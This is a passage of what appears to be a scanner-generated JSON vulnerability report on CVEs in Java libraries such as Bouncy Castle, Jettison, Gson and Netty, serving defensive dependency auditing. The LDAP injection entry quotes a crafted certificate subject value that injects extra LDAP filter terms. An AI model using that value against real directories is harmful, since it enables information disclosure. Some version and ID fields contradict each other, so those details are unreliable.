type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-26939"]}],"cve":"CVE-2020-26939","cwe":{"id":"203","name":"Observable Discrepancy"},"discovery_date":"2021-04-22T16:16:49","ids":[{"system_name":"CVE Record","text":"CVE-2020-26939"},{"system_name":"NetApp Advisory","text":"ntap-20201202-0005"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Observable Differences in Behavior to Error Inputs in Bouncy Castle"},{"category":"details","details":"Vulnerability Details","text":"# Observable Differences in Behavior to Error Inputs in Bouncy Castle In Legion of the Bouncy Castle BC before 1.55 and BC-FJA before 1.0.2, attackers can obtain sensitive information about a private exponent because of Observable Differences in Behavior to Error Inputs. This occurs in org.bouncycastle.crypto.encodings.OAEPEncoding. Sending invalid ciphertext that decrypts to a short payload in the OAEP Decoder could result in the throwing of an early exception, potentially leaking some information about the private exponent of the RSA private key performing the encryption."}],"product_status":{"known_affected":["org.bouncycastle/bcprov-jdk15on@vers:maven/>=1.46|<=1.60"],"known_not_affected":["org.bouncycastle/bcprov-jdk15on@1.55"]},"references":[{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r8c36ba34e80e05eecb1f80071cc834d705616f315b634ec0c7d8f42e@%3Cissues.solr.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/11/msg00007.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-26939"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-26939"},{"summary":"NetApp Advisory ntap-20201202-0005","url":"https://security.netapp.com/advisory/ntap-20201202-0005"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":5.3,"baseSeverity":"MEDIUM","confidentialityImpact":"LOW","environmentalScore":5.3,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"LOW","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":5.3,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N","version":"3.1"},"products":["org.bouncycastle/bcprov-jdk15on@vers:maven/>=1.46|<=1.60"]}],"title":"CVE-2020-26939/pkg:maven/org.bouncycastle/bcprov-jdk15on@1.55?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2023-33201"]}],"cve":"CVE-2023-33201","cwe":{"id":"295","name":"Improper Certificate Validation"},"discovery_date":"2023-07-05T03:30:23","ids":[{"system_name":"CVE Record","text":"CVE-2023-33201"},{"system_name":"NetApp Advisory","text":"ntap-20230824-0008"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Bouncy Castle For Java LDAP injection vulnerability"},{"category":"details","details":"Vulnerability Details","text":"# Bouncy Castle For Java LDAP injection vulnerability Bouncy Castle provides the `X509LDAPCertStoreSpi.java` class which can be used in conjunction with the CertPath API for validating certificate paths. Pre-1.73 the implementation did not check the X.500 name of any certificate, subject, or issuer being passed in for LDAP wild cards, meaning the presence of a wild car may lead to Information Disclosure.  A potential attack would be to generate a self-signed certificate with a subject name that contains special characters, e.g: `CN=Subject*)(objectclass=`. This will be included into the filter and provides the attacker ability to specify additional attributes in the search query. This can be exploited as a blind LDAP injection: an attacker can enumerate valid attribute values using the boolean blind injection technique. The exploitation depends on the structure of the target LDAP directory, as well as what kind of errors are exposed to the user.  Changes to the `X509LDAPCertStoreSpi.java` class add the additional checking of any X.500 name used to correctly escape wild card characters."}],"product_status":{"known_affected":["org.bouncycastle/bcprov-jdk15on@vers:maven/>=1.49|<=1.70"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2023/08/msg00000.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-33201"},{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-33201"},{"summary":"NetApp Advisory ntap-20230824-0008","url":"https://security.netapp.com/advisory/ntap-20230824-0008"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":5.3,"baseSeverity":"MEDIUM","confidentialityImpact":"LOW","environmentalScore":5.3,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"LOW","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":5.3,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N","version":"3.1"},"products":["org.bouncycastle/bcprov-jdk15on@vers:maven/>=1.49|<=1.70"]}],"title":"CVE-2023-33201/pkg:maven/org.bouncycastle/bcprov-jdk15on@1.55?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2023-33202"]}],"cve":"CVE-2023-33202","cwe":{"id":"400","name":"Uncontrolled Resource Consumption"},"discovery_date":"2023-11-23T18:30:33","ids":[{"system_name":"CVE Record","text":"CVE-2023-33202"},{"system_name":"NetApp Advisory","text":"ntap-20240125-0001"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Bouncy Castle Denial of Service (DoS)"},{"category":"details","details":"Vulnerability Details","text":"# Bouncy Castle Denial of Service (DoS) Bouncy Castle for Java before 1.73 contains a potential Denial of Service (DoS) issue within the Bouncy Castle org.bouncycastle.openssl.PEMParser class. This class parses OpenSSL PEM encoded streams containing X.509 certificates, PKCS8 encoded keys, and PKCS7 objects. Parsing a file that has crafted ASN.1 data through the PEMParser causes an OutOfMemoryError, which can enable a denial of service attack."}],"product_status":{"known_affected":["org.bouncycastle/bcprov-jdk15on@vers:maven/>=1.46|<=1.70"],"known_not_affected":["org.bouncycastle/bcprov-jdk15on@1.73"]},"references":[{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-33202"},{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-33202"},{"summary":"NetApp Advisory ntap-20240125-0001","url":"https://security.netapp.com/advisory/ntap-20240125-0001"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"LOCAL","availabilityImpact":"HIGH","baseScore":5.5,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":5.5,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"LOCAL","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"REQUIRED","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":5.5,"temporalSeverity":"MEDIUM","userInteraction":"REQUIRED","vectorString":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H","version":"3.1"},"products":["org.bouncycastle/bcprov-jdk15on@vers:maven/>=1.46|<=1.70"]}],"title":"CVE-2023-33202/pkg:maven/org.bouncycastle/bcprov-jdk15on@1.55?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-40149"]}],"cve":"CVE-2022-40149","cwe":{"id":"121","name":"Stack-based Buffer Overflow"},"discovery_date":"2022-09-17T00:00:41","ids":[{"system_name":"CVE Record","text":"CVE-2022-40149"},{"system_name":"Debian Advisory","text":"dsa-5312"}],"notes":[{"audience":"developers","category":"other","text":"Out-of-bounds Write","title":"Additional CWE: 787"},{"category":"description","details":"Vulnerability Description","text":"Jettison parser crash by stackoverflow"},{"category":"details","details":"Vulnerability Details","text":"# Jettison parser crash by stackoverflow Those using Jettison to parse untrusted XML or JSON data may be vulnerable to Denial of Service attacks (DOS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow. This effect may support a denial of service attack."}],"product_status":{"known_affected":["org.codehaus.jettison/jettison@vers:maven/>=1.0-RC1|<=1.5.0"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/11/msg00011.html"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-40149"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-40149"},{"summary":"Debian Advisory dsa-5312","url":"https://www.debian.org/security/2023/dsa-5312"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":6.5,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":6.5,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":6.5,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["org.codehaus.jettison/jettison@vers:maven/>=1.0-RC1|<=1.5.0"]}],"title":"CVE-2022-40149/pkg:maven/org.codehaus.jettison/jettison@1.3.7?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-45685"]}],"cve":"CVE-2022-45685","cwe":{"id":"787","name":"Out-of-bounds Write"},"discovery_date":"2022-12-13T15:30:26","ids":[{"system_name":"CVE Record","text":"CVE-2022-45685"},{"system_name":"Debian Advisory","text":"dsa-5312"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Jettison Out-of-bounds Write vulnerability"},{"category":"details","details":"Vulnerability Details","text":"# Jettison Out-of-bounds Write vulnerability A stack overflow in Jettison before v1.5.2 allows attackers to cause a Denial of Service (DoS) via crafted JSON data."}],"product_status":{"known_affected":["org.codehaus.jettison/jettison@vers:maven/>=1.0-RC1|<=1.5.1"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/12/msg00045.html"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-45685"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-45685"},{"summary":"Debian Advisory dsa-5312","url":"https://www.debian.org/security/2023/dsa-5312"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["org.codehaus.jettison/jettison@vers:maven/>=1.0-RC1|<=1.5.1"]}],"title":"CVE-2022-45685/pkg:maven/org.codehaus.jettison/jettison@1.3.7?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-45693"]}],"cve":"CVE-2022-45693","cwe":{"id":"787","name":"Out-of-bounds Write"},"discovery_date":"2022-12-13T15:30:27","ids":[{"system_name":"CVE Record","text":"CVE-2022-45693"},{"system_name":"Debian Advisory","text":"dsa-5312"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Jettison Out-of-bounds Write vulnerability"},{"category":"details","details":"Vulnerability Details","text":"# Jettison Out-of-bounds Write vulnerability Jettison before v1.5.2 was discovered to contain a stack overflow via the map parameter. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted string."}],"product_status":{"known_affected":["org.codehaus.jettison/jettison@vers:maven/>=1.0-RC1|<=1.5.1"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/12/msg00045.html"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-45693"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-45693"},{"summary":"Debian Advisory dsa-5312","url":"https://www.debian.org/security/2023/dsa-5312"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["org.codehaus.jettison/jettison@vers:maven/>=1.0-RC1|<=1.5.1"]}],"title":"CVE-2022-45693/pkg:maven/org.codehaus.jettison/jettison@1.3.7?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2023-1436"]}],"cve":"CVE-2023-1436","cwe":{"id":"674","name":"Uncontrolled Recursion"},"discovery_date":"2023-03-22T06:30:21","ids":[{"system_name":"CVE Record","text":"CVE-2023-1436"},{"system_name":"JFrog Advisory","text":"jettison-json-array-dos-xray-427911"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Jettison vulnerable to infinite recursion"},{"category":"details","details":"Vulnerability Details","text":"# Jettison vulnerable to infinite recursion An infinite recursion is triggered in Jettison when constructing a JSONArray from a Collection that contains a self-reference in one of its elements. This leads to a StackOverflowError exception being thrown."}],"product_status":{"known_affected":["org.codehaus.jettison/jettison@vers:maven/>=1.0-RC1|<=1.5.3"]},"references":[{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-1436"},{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-1436"},{"summary":"JFrog Advisory jettison-json-array-dos-xray-427911","url":"https://research.jfrog.com/vulnerabilities/jettison-json-array-dos-xray-427911"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["org.codehaus.jettison/jettison@vers:maven/>=1.0-RC1|<=1.5.3"]}],"title":"CVE-2023-1436/pkg:maven/org.codehaus.jettison/jettison@1.3.7?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-40150"]}],"cve":"CVE-2022-40150","cwe":{"id":"400","name":"Uncontrolled Resource Consumption"},"discovery_date":"2022-09-17T00:00:41","ids":[{"system_name":"CVE Record","text":"CVE-2022-40150"},{"system_name":"Debian Advisory","text":"dsa-5312"}],"notes":[{"audience":"developers","category":"other","text":"Uncontrolled Recursion","title":"Additional CWE: 674"},{"category":"description","details":"Vulnerability Description","text":"Jettison memory exhaustion"},{"category":"details","details":"Vulnerability Details","text":"# Jettison memory exhaustion Those using Jettison to parse untrusted XML or JSON data may be vulnerable to Denial of Service attacks (DOS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by Out of memory. This effect may support a denial of service attack."}],"product_status":{"known_affected":["org.codehaus.jettison/jettison@vers:maven/>=1.0-RC1|<=1.5.1"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/12/msg00045.html"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-40150"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-40150"},{"summary":"Debian Advisory dsa-5312","url":"https://www.debian.org/security/2023/dsa-5312"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["org.codehaus.jettison/jettison@vers:maven/>=1.0-RC1|<=1.5.1"]}],"title":"CVE-2022-40150/pkg:maven/org.codehaus.jettison/jettison@1.3.7?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-25647"]}],"cve":"CVE-2022-25647","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2022-05-03T00:00:44","ids":[{"system_name":"CVE Record","text":"CVE-2022-25647"},{"system_name":"Snyk Advisory","text":"SNYK-JAVA-COMGOOGLECODEGSON-1730327"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Debian Advisory","text":"dsa-5227"},{"system_name":"NetApp Advisory","text":"ntap-20220901-0009"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Deserialization of Untrusted Data in Gson"},{"category":"details","details":"Vulnerability Details","text":"# Deserialization of Untrusted Data in Gson The package `com.google.code.gson:gson` before 2.8.9 is vulnerable to Deserialization of Untrusted Data via the `writeReplace()` method in internal classes, which may lead to denial of service attacks.  ## Related CVE(s) CVE-2022-25647, SNYK-JAVA-COMGOOGLECODEGSON-1730327"}],"product_status":{"known_affected":["com.google.code.gson/gson@vers:maven/>=1.1|<=2.8.8"],"known_not_affected":["com.google.code.gson/gson@2.8.9"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/05/msg00015.html"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/09/msg00009.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-25647"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-25647"},{"summary":"NetApp Advisory ntap-20220901-0009","url":"https://security.netapp.com/advisory/ntap-20220901-0009"},{"summary":"Snyk Advisory SNYK-JAVA-COMGOOGLECODEGSON-1730327","url":"https://snyk.io/vuln/SNYK-JAVA-COMGOOGLECODEGSON-1730327"},{"summary":"Debian Advisory dsa-5227","url":"https://www.debian.org/security/2022/dsa-5227"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.7,"baseSeverity":"HIGH","confidentialityImpact":"LOW","environmentalScore":7.7,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"LOW","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.7,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:H","version":"3.1"},"products":["com.google.code.gson/gson@vers:maven/>=1.1|<=2.8.8"]}],"title":"CVE-2022-25647/pkg:maven/com.google.code.gson/gson@2.8.0?type=jar"},{"acknowledgements":[{"organization":"Mitre"}],"cve":"CVE-2021-21290","cwe":{"id":"378","name":"Creation of Temporary File With Insecure Permissions"},"discovery_date":"2022-05-10T08:46:50","ids":[{"system_name":"CVE Record","text":"CVE-2022-24823"},{"system_name":"GitHub Advisory","text":"GHSA-269q-hmxg-m83q"},{"system_name":"GitHub Advisory","text":"GHSA-5mcr-gq6c-3hq2"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"NetApp Advisory","text":"ntap-20220616-0004"}],"notes":[{"audience":"developers","category":"other","text":"Creation of Temporary File in Directory with Insecure Permissions","title":"Additional CWE: 379"},{"audience":"developers","category":"other","text":"Exposure of Resource to Wrong Sphere","title":"Additional CWE: 668"},{"category":"description","details":"Vulnerability Description","text":"Local Information Disclosure Vulnerability in io.netty:netty-codec-http"},{"category":"details","details":"Vulnerability Details","text":"# Local Information Disclosure Vulnerability in io.netty:netty-codec-http ### Description ### [GHSA-5mcr-gq6c-3hq2](https://github.com/netty/netty/security/advisories/GHSA-5mcr-gq6c-3hq2) (CVE-2021-21290) contains an insufficient fix for the vulnerability identified.  ### Impact ###  When netty's multipart decoders are used local information disclosure can occur via the local system temporary directory if temporary storing uploads on the disk is enabled.  This only impacts applications running on Java version 6 and lower. Additionally, this vulnerability impacts code running on Unix-like systems, and very old versions of Mac OSX and Windows as they all share the system temporary directory between all users.  ### Vulnerability Details ###  To fix the vulnerability the code was changed to the following:  ```java   @SuppressJava6Requirement(reason = \"Guarded by version check\")   public static File createTempFile(String prefix, String suffix, File directory) throws IOException {     if (javaVersion() >= 7) {       if (directory == null) {         return Files.createTempFile(prefix, suffix).toFile();       }       return Files.createTempFile(directory.toPath(), prefix, suffix).toFile();     }     if (directory == null) {       return File.createTempFile(prefix, suffix);     }     File file = File.createTempFile(prefix, suffix, directory);     // Try to adjust the perms, if this fails there is not much else we can do...     file.setReadable(false, false);     file.setReadable(true, true);     return file;   } ```  Unfortunately, this logic path was left vulnerable:  ```java     if (directory == null) {       return File.createTempFile(prefix, suffix);     } ```  This file is still readable by all local users.  ### Patches ###  Update to 4.1.77.Final  ### Workarounds ###  Specify your own `java.io.tmpdir` when you start the JVM or use `DefaultHttpDataFactory.setBaseDir(...)` to set the directory to something that is only readable by the current user or update to Java 7 or above.  ### References ###   - [CWE-378: Creation of Temporary File With Insecure Permissions](https://cwe.mitre.org/data/definitions/378.html)  - [CWE-379: Creation of Temporary File in Directory with Insecure Permissions](https://cwe.mitre.org/data/definitions/379.html)   ### For more information ###  If you have any questions or comments about this advisory:  Open an issue in [netty](https://github.com/netty/netty)   ## Related CVE(s) CVE-2021-21290, CVE-2022-24823, GHSA-5mcr-gq6c-3hq2"}],"product_status":{"known_affected":["io.netty/netty-codec-http@vers:maven/>=4.0.0.Alpha1|<=4.1.9.Final"]},"references":[{"summary":"GitHub Advisory GHSA-269q-hmxg-m83q","url":"https://github.com/netty/netty/security/advisories/GHSA-269q-hmxg-m83q"},{"summary":"GitHub Advisory GHSA-5mcr-gq6c-3hq2","url":"https://github.com/netty/netty/security/advisories/GHSA-5mcr-gq6c-3hq2"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-24823"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-24823"},{"summary":"NetApp Advisory ntap-20220616-0004","url":"https://security.netapp.com/advisory/ntap-20220616-0004"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"LOCAL","availabilityImpact":"NONE","baseScore":5.5,"baseSeverity":"MEDIUM","confidentialityImpact":"HIGH","environmentalScore":5.5,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"LOCAL","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":5.5,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N","version":"3.1"},"products":["io.netty/netty-codec-http@vers:maven/>=4.0.0.Alpha1|<=4.1.9.Final"]}],"title":"CVE-2021-21290/pkg:maven/io.netty/netty-codec-http@4.0.27.Final?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-43797"]}],"cve":"CVE-2021-43797","cwe":{"id":"444","name":"Inconsistent Interpretation of HTTP Requests"},"discovery_date":"2021-12-09T19:09:17","ids":[{"system_name":"CVE Record","text":"CVE-2021-43797"},{"system_name":"GitHub Advisory","text":"GHSA-wx5j-54mm-rqqq"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Debian Advisory","text":"dsa-5316"},{"system_name":"NetApp Advisory","text":"ntap-20220107-0003"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"HTTP request smuggling in netty"},{"category":"details","details":"Vulnerability Details","text":"# HTTP request smuggling in netty ### Impact  Netty currently just skips control chars when these are present at the beginning / end of the header name. We should better fail fast as these are not allowed by the spec and could lead to HTTP request smuggling.  Failing to do the validation might cause netty to \"sanitize\" header names before it forward these to another remote system when used as proxy. This remote system can't see the invalid usage anymore and so not do the validation itself."}],"product_status":{"known_affected":["io.netty/netty-codec-http@vers:maven/>=4.0.0|<4.1.71.Final"],"known_not_affected":["io.netty/netty-codec-http@4.1.71.Final"]},"references":[{"summary":"GitHub Advisory GHSA-wx5j-54mm-rqqq","url":"https://github.com/netty/netty/security/advisories/GHSA-wx5j-54mm-rqqq"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2023/01/msg00008.html"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-43797"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-43797"},{"summary":"NetApp Advisory ntap-20220107-0003","url":"https://security.netapp.com/advisory/ntap-20220107-0003"},{"summary":"Debian Advisory dsa-5316","url":"https://www.debian.org/security/2023/dsa-5316"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":6.5,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":6.5,"environmentalSeverity":"MEDIUM","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"REQUIRED","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":6.5,"temporalSeverity":"MEDIUM","userInteraction":"REQUIRED","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N","version":"3.1"},"products":["io.netty/netty-codec-http@vers:maven/>=4.0.0|<4.1.71.Final"]}],"title":"CVE-2021-43797/pkg:maven/io.netty/netty-codec-http@4.0.27.Final?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-37137"]}],"cve":"CVE-2021-37137","cwe":{"id":"400","name":"Uncontrolled Resource Consumption"},"discovery_date":"2021-09-09T17:11:31","ids":[{"system_name":"CVE Record","text":"CVE-2021-37137"},{"system_name":"GitHub Advisory","text":"GHSA-9vjp-v76f-g363"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Debian Advisory","text":"dsa-5316"},{"system_name":"NetApp Advisory","text":"ntap-20220210-0012"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"\\tSnappyFrameDecoder doesn't restrict chunk length any may buffer skippable chunks in an unnecessary way"},{"category":"details","details":"Vulnerability 